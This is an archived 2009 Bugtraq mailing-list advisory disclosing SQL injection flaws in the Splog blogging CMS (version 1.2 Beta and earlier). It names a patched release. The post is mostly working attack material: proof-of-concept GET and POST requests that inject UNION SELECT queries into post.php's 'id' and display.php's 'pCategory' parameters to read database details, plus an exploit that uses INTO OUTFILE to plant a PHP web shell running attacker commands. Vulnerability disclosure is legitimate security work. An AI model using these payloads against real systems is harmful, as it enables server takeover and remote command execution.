Home page logo
/

bugtraq logo Bugtraq mailing list archives

MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->
From: y3nh4ck3r () gmail com
Date: 11 Jun 2009 08:54:57 -0000

-----------------------------------------------------------------
MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta-->
-----------------------------------------------------------------

CMS INFORMATION:

-->WEB: http://sourceforge.net/projects/splog/
-->DOWNLOAD: http://sourceforge.net/projects/splog/
-->DEMO: N/A
-->CATEGORY: CMS / Blogging
-->DESCRIPTION: Splog is a simple PHP and MySQL blogging framework allowing
                full integration into a website by being designed for use...
-->RELEASED: 2009-06-01

CMS VULNERABILITY:

-->TESTED ON: firefox 3
-->DORK: N/A
-->CATEGORY: SQL INJECTION
-->AFFECT VERSION: <= 1.2-Beta (Checked previous versions are also vulns)
-->Discovered Bug date: 2009-06-08
-->Reported Bug date: 2009-06-09
-->Fixed bug date: 2009-06-10
-->Info patch (1.3): http://sourceforge.net/projects/splog/
-->Author: YEnH4ckEr
-->mail: y3nh4ck3r[at]gmail[dot]com
-->WEB/BLOG: N/A
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)



#########################
////////////////////////

SQL INJECTION (SQLi):

////////////////////////
#########################


-------------------
PROOF OF CONCEPT:
-------------------


<<<<---------++++++++++++++ Condition: magic quotes=OFF/ON +++++++++++++++++--------->>>>



[++] GET var --> 'id'

[++] File vuln --> 'post.php'


~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+SELECT+1,user(),database(),version(),user(),database()%23



<<<<---------++++++++++++++ Condition: magic quotes=OFF +++++++++++++++++--------->>>>


[++] POST var --> 'pCategory'

[++] File vuln --> 'display.php'


POST http://[HOST]/[PATH]/display.php HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Referer: http://[HOST]/[PATH]/display.php
Content-Type: application/x-www-form-urlencoded
pCategory=-1'+UNION+SELECT+1,2,3,4,5,6# <--- INJECTION


[++[Return]++] ~~~~~> user, version or database.


----------
EXPLOIT:
----------


<<<<---------++++++++++++++ Extra-Condition: privileges to create files +++++++++++++++++--------->>>>


[GET]~~~~~> http://[HOST]/[PATH]/post.php?id=-1+UNION+ALL+SELECT+&apos;<HTML><title>SPLOG <= 1.2 Beta--SHELL BY 
--Y3NH4CK3R--></title>','<body text=ffffff bgcolor=000000><center><h1>YOUR SHELL IS 
ON!<br>','</h1></center><br><br><font color=ff0000><h2>Get var (cmd) to execute comands. Enjoy 
it!</h2>','</font><h3>Command Result:</h3><?php system($_GET[cmd]); ?>','<br><br><font color=ff0000>','<h3>By 
y3nh4ck3r. Contact: y3nh4ck3r () gmail com</h3></font></body></HTML>'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'%23

[POST]~~~~~>

POST http://[HOST]/[PATH]/display.php HTTP/1.1
Host: [HOST]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10
Referer: http://[HOST]/[PATH]/display.php
Content-Type: application/x-www-form-urlencoded
pCategory=-1'+UNION+ALL+SELECT+'<HTML><title>SPLOG <= 1.2 Beta--SHELL BY --Y3NH4CK3R--></title>','<body text=ffffff 
bgcolor=000000><center><h1>YOUR SHELL IS ON!<br>','</h1></center><br><br><font color=ff0000><h2>Get var (cmd) to 
execute comands. Enjoy it!</h2>','</font><h3>Command Result:</h3><?php system($_GET[cmd]); ?>','<br><br><font 
color=ff0000>','<h3>By y3nh4ck3r. Contact: y3nh4ck3r () gmail 
com</h3></font></body></HTML>'+INTO+OUTFILE+'[COMPLETE-PATH]/shell.php'# <--- INJECTION


[++[Return]++] ~~~~~> Your shell in http://[HOST]/[PATH]/shell.php




#######################################################################
#######################################################################
##*******************************************************************##
##  SPECIAL GREETZ TO: Str0ke, JosS, Ulises2k, J. McCray, Evil1 ...  ##
##*******************************************************************##
##-------------------------------------------------------------------##
##*******************************************************************##
##              GREETZ TO: SPANISH H4ck3Rs community!                ##
##*******************************************************************##
#######################################################################
#######################################################################


  By Date           By Thread  

Current thread:
  • MULTIPLE SQL INJECTION VULNERABILITIES --Splog <= v-1.2 Beta--> y3nh4ck3r (Jun 11)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]